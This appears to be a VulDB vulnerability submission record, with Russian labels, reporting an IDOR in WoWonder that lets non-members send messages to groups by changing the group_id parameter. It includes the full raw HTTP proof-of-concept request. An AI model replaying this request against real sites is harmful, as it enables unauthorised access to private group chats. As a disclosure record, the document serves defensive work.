| Название | Wowonder IDOR (can send messages to other groups even though we are not members) |
|---|
| Описание | Wowonder IDOR where can send messages to other groups even though we are not members, only by changing the value of the group_id parameter.
REQUEST
POST /requests.php?f=chat&s=send_message&group_id=511&hash=80e5212754a824d3a4ae HTTP/1.1
Host: demo.wowonder.com
Cookie: yourcookie
Content-Length: 101571
Sec-Ch-Ua: "(Not(A:Brand";v="8", "Chromium";v="101"
Accept: */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryWZdiBTyOginnwRLy
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://demo.wowonder.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://demo.wowonder.com/timeline&u=1651666578976685_172980&ref=se
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
------WebKitFormBoundaryWZdiBTyOginnwRLy
Content-Disposition: form-data; name="textSendMessage"
test
------WebKitFormBoundaryWZdiBTyOginnwRLy
Content-Disposition: form-data; name="sendMessageFile"; filename="bg-spo.jpg"
Content-Type: image/jpeg
------WebKitFormBoundaryWZdiBTyOginnwRLy--
|
|---|
| Источник | ⚠️ https://youtu.be/tIzOZtp2fxA |
|---|
| Пользователь | fariqfgi (UID 24514) |
|---|
| Представление | 17.05.2022 06:35 (4 лет назад) |
|---|
| Модерация | 17.05.2022 06:54 (19 minutes later) |
|---|
| Статус | принято |
|---|
| Запись VulDB | 199974 [WoWonder Group /requests.php group_id эскалация привилегий] |
|---|
| Баллы | 17 |
|---|